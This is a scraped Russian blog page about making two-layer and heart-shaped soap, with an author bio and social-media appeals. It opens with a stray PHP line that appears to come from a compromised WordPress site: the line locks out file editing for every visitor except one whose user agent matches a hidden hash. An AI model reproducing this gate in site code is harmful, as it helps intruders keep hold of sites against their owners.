if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Видеомастер-классы, как сделать двухслойное мыло | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Видеомастер-классы, как сделать двухслойное мыло

Это видео домашнего мыловарения - прекрасный пример того, что даже расстояние не может помешать заниматься любимым делом. Окрыленные изобилием идей, авторы приступили к изготовлению двухслойного мыла

Это видео домаш­не­го мыло­ва­ре­ния — пре­крас­ный при­мер того, что даже рас­сто­я­ние не может поме­шать зани­мать­ся люби­мым делом. Окры­лен­ные изоби­ли­ем идей, авто­ры при­сту­пи­ли к изго­тов­ле­нию двух­слой­но­го мыла. Пер­вым изде­ли­ем ста­ло мыль­це, тона кото­ро­го плав­но пере­хо­дят из зеле­но­го в жел­тые, а обо­рот­ная сто­ро­на выпол­не­на из белой мыль­ной осно­вы. В каче­стве аро­ма­та для тако­го двух­слой­но­го мыль­ца домаш­ние мыло­ва­ры выбра­ли необыч­ный запах дет­ской жева­тель­ной резин­ки, кото­рая напо­ми­на­ет авто­рам детство.

Затем девуш­ки изго­то­ви­ли неболь­шие мыль­ца в фор­ме сер­де­чек и нача­ли рас­смат­ри­вать ранее сде­лан­ные изде­лия в фор­ме сне­жин­ки. Этот видео­фраг­мент гово­рит о мно­го­об­ра­зии идей и воз­мож­но­стей для их испол­не­ния, кото­рые откры­ва­ет перед нами мыло­ва­ре­ние. Любая мысль может быть обра­ще­на в яркие фор­мы, аро­мат для кото­рых каж­дый может выбрать по сво­е­му вку­су. А если подо­брать мас­ла и отдуш­ки, обла­да­ю­щи­ми полез­ны­ми свой­ства­ми и мик­ро­эле­мен­та­ми, то кра­си­вое изде­лие может стать еще и неве­ро­ят­но полезным.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!